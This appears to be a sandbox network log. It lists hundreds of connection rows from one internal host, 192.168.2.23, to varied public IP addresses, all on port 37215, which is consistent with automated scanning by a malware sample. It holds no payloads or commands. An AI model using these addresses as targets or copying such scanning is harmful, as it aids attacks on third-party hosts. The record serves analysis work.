                                          12422192.168.2.2333408157.72.67.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12423192.168.2.2351382157.105.218.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12424192.168.2.2358238157.151.51.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12425192.168.2.2339832157.234.183.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12426192.168.2.2339444157.139.172.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12427192.168.2.2360976157.183.121.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12428192.168.2.2346488197.192.224.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12429192.168.2.2335948197.202.160.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12430192.168.2.2333070157.245.18.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12431192.168.2.2352772203.215.163.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12432192.168.2.2349598213.170.73.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12433192.168.2.2358400197.167.135.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12434192.168.2.2354162140.40.145.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12435192.168.2.2342076157.90.77.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12436192.168.2.2334574157.107.107.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12437192.168.2.2347718157.54.94.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12438192.168.2.235077085.154.230.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12439192.168.2.2360272197.239.197.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12440192.168.2.234344234.222.145.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12441192.168.2.2359692190.216.207.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12442192.168.2.2354176157.182.127.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12443192.168.2.2345372197.250.239.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12444192.168.2.2354824197.199.112.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12445192.168.2.2333668113.19.155.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12446192.168.2.2349810157.128.16.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12447192.168.2.2333810157.53.142.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12448192.168.2.234465241.54.159.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12449192.168.2.2348442197.154.93.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12450192.168.2.2359676157.145.20.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12451192.168.2.235796638.46.171.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12452192.168.2.2347480197.3.192.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12453192.168.2.235245647.34.149.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12454192.168.2.233428641.245.102.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12455192.168.2.2345110157.164.237.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12456192.168.2.2355776197.197.98.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12457192.168.2.234126046.0.55.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12458192.168.2.234752241.106.121.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12459192.168.2.2337106197.237.174.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12460192.168.2.2333166210.150.239.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12461192.168.2.2338916157.120.30.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12462192.168.2.234743258.114.239.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12463192.168.2.234474841.10.233.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12464192.168.2.2336258157.52.123.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12465192.168.2.235983441.44.133.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12466192.168.2.234442041.135.220.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12467192.168.2.235047641.106.20.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12468192.168.2.2337860119.102.195.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12469192.168.2.2344580157.70.190.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12470192.168.2.234758841.236.40.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12471192.168.2.2340840157.68.148.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12472192.168.2.2354812183.108.113.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12473192.168.2.234387841.67.237.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12474192.168.2.2351934197.189.72.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12475192.168.2.2359578199.64.212.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12476192.168.2.2336698157.233.95.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12477192.168.2.2335940197.97.156.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12478192.168.2.2354746157.198.39.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12479192.168.2.2345240197.224.78.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12480192.168.2.2333152104.65.153.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12481192.168.2.2335170157.36.109.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12482192.168.2.2342596157.29.244.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12483192.168.2.233821061.238.84.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12484192.168.2.2343236197.106.116.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12485192.168.2.233585841.178.42.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12486192.168.2.2346798197.97.126.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12487192.168.2.234583041.35.139.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12488192.168.2.2344580192.101.156.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12489192.168.2.2335284157.238.154.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12490192.168.2.2347428197.251.122.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12491192.168.2.2359408197.209.55.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12492192.168.2.234556441.57.202.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12493192.168.2.234125271.12.112.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12494192.168.2.2355268197.58.222.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12495192.168.2.234062097.50.15.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12496192.168.2.236033899.102.27.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12497192.168.2.233826041.203.131.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12498192.168.2.2342896157.103.102.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12499192.168.2.2348824204.166.21.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12500192.168.2.2340982141.194.158.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12501192.168.2.235122641.195.150.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12502192.168.2.235711232.1.224.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12503192.168.2.2340130206.160.54.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12504192.168.2.234744439.77.112.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12505192.168.2.2348894157.224.54.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12506192.168.2.2353202197.106.120.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12507192.168.2.233701841.214.37.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12508192.168.2.234658261.121.168.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12509192.168.2.2338482197.126.187.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12510192.168.2.2356200140.161.218.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12511192.168.2.2353342197.224.119.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12512192.168.2.234266427.218.200.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12513192.168.2.235722623.33.2.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12514192.168.2.234945441.136.6.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12515192.168.2.2352472197.200.150.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12516192.168.2.2351308157.220.99.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12517192.168.2.235051241.26.83.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12518192.168.2.2355412197.79.113.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12519192.168.2.2352130157.8.38.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12520192.168.2.235240641.134.202.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12521192.168.2.2334508197.7.168.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12522192.168.2.235893241.157.172.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12523192.168.2.2358882157.94.162.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12524192.168.2.2358058212.73.50.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12525192.168.2.235886841.246.55.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12526192.168.2.2342424157.68.177.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12527192.168.2.2355760197.56.98.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12528192.168.2.2355486157.90.137.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12529192.168.2.2341768197.23.116.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12530192.168.2.2358720197.14.116.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12531192.168.2.2343986157.166.2.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12532192.168.2.234399241.165.191.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12533192.168.2.2348592157.147.112.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12534192.168.2.234541641.206.200.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12535192.168.2.234787641.222.48.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12536192.168.2.234059850.99.252.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12537192.168.2.235591441.4.108.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12538192.168.2.2339334157.19.242.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12539192.168.2.2349962197.238.138.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12540192.168.2.236089041.241.236.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12541192.168.2.235994241.58.232.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12542192.168.2.2339586197.54.0.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12543192.168.2.2352116197.43.77.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12544192.168.2.235740041.113.123.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12545192.168.2.2357904157.190.15.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12546192.168.2.2335814125.216.133.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12547192.168.2.2338744210.17.114.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12548192.168.2.2343348157.58.199.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12549192.168.2.2352944197.48.229.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12550192.168.2.2341916197.188.111.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12551192.168.2.2346158219.208.45.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12552192.168.2.235644041.96.30.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12553192.168.2.2346374168.135.205.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12554192.168.2.2337382135.84.18.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12555192.168.2.2355762157.209.246.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12556192.168.2.2343798197.247.28.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12557192.168.2.235220013.167.212.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12558192.168.2.2357384147.255.138.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12559192.168.2.2335910157.150.110.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12560192.168.2.2356252218.99.237.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12561192.168.2.233495641.164.81.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12562192.168.2.2333760157.213.102.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12563192.168.2.2358988157.100.9.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12564192.168.2.2334070197.15.49.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12565192.168.2.2348110157.198.46.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12566192.168.2.2335070197.72.144.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12567192.168.2.2336528105.5.155.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12568192.168.2.2352584157.29.144.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12569192.168.2.234659041.51.199.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12570192.168.2.2344698161.30.221.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12571192.168.2.2354818197.45.58.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12572192.168.2.235520286.113.97.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12573192.168.2.2360608197.114.189.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12574192.168.2.234367431.90.121.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12575192.168.2.235569441.174.199.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12576192.168.2.2348044195.174.44.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12577192.168.2.2334740157.20.102.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12578192.168.2.235366841.78.4.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12579192.168.2.2357268197.158.30.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12580192.168.2.235763841.26.206.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12581192.168.2.233783441.138.224.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12582192.168.2.233284641.138.143.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12583192.168.2.233972441.167.96.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12584192.168.2.23574544.23.27.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12585192.168.2.2350586197.241.143.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12586192.168.2.235492091.11.192.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12587192.168.2.2340472157.88.165.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12588192.168.2.2341886197.81.46.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12589192.168.2.2349478157.194.74.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12590192.168.2.2339070157.137.220.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12591192.168.2.234137041.209.6.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12592192.168.2.2348194157.230.194.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12593192.168.2.235646241.167.10.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12594192.168.2.2339326207.71.94.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12595192.168.2.2356376143.253.18.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12596192.168.2.2353572213.186.192.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12597192.168.2.2350068197.47.161.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12598192.168.2.235723239.100.206.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12599192.168.2.234168253.203.172.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12600192.168.2.2344648197.160.249.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12601192.168.2.233636841.187.116.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12602192.168.2.234156641.20.97.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12603192.168.2.2347118197.57.225.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12604192.168.2.2339384157.217.190.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12605192.168.2.2357178157.109.5.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12606192.168.2.233770444.3.173.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12607192.168.2.2336444102.96.17.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12608192.168.2.2350094197.102.82.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12609192.168.2.2353686197.128.31.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12610192.168.2.2352078197.177.72.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12611192.168.2.2337352197.49.188.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12612192.168.2.2343390197.68.217.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12613192.168.2.2339868197.242.4.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12614192.168.2.233977241.92.0.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12615192.168.2.23598402.208.202.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12616192.168.2.2350052199.134.106.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12617192.168.2.2351552157.6.214.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12618192.168.2.233698241.208.229.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12619192.168.2.233654241.36.200.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12620192.168.2.2343400157.178.124.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12621192.168.2.235266041.128.164.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12622192.168.2.236060460.83.124.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12623192.168.2.2353900197.58.53.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12624192.168.2.235421441.251.210.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12625192.168.2.2334024157.67.207.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12626192.168.2.2339696157.38.196.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12627192.168.2.233801041.173.26.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12628192.168.2.2352290166.87.54.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12629192.168.2.2355754197.131.152.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12630192.168.2.2339390157.209.56.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12631192.168.2.2346564197.164.48.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12632192.168.2.2341352157.30.114.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12633192.168.2.2347702197.71.198.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12634192.168.2.235906258.88.174.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12635192.168.2.234849691.142.49.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12636192.168.2.2356254126.29.94.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12637192.168.2.2359628124.255.93.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12638192.168.2.234196841.165.253.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12639192.168.2.2334216157.99.173.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12640192.168.2.2355270170.235.94.23237215
